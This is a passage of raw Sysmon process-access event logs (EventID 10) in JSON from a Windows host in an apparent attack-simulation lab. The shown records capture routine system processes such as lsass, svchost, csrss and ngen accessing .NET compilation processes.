06:00:31.231","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-001042D41200}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.700\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-001042E81200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.700","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-001042E81200}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.700\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-001042E81200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.700","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-001042E81200}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-001042E81200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-001042E81200}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.981\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-0010BAEB1200}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.981","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-0010BAEB1200}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-0010BAEB1200}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-0010BAEB1200}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:32","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.997\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-0010BAEB1200}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 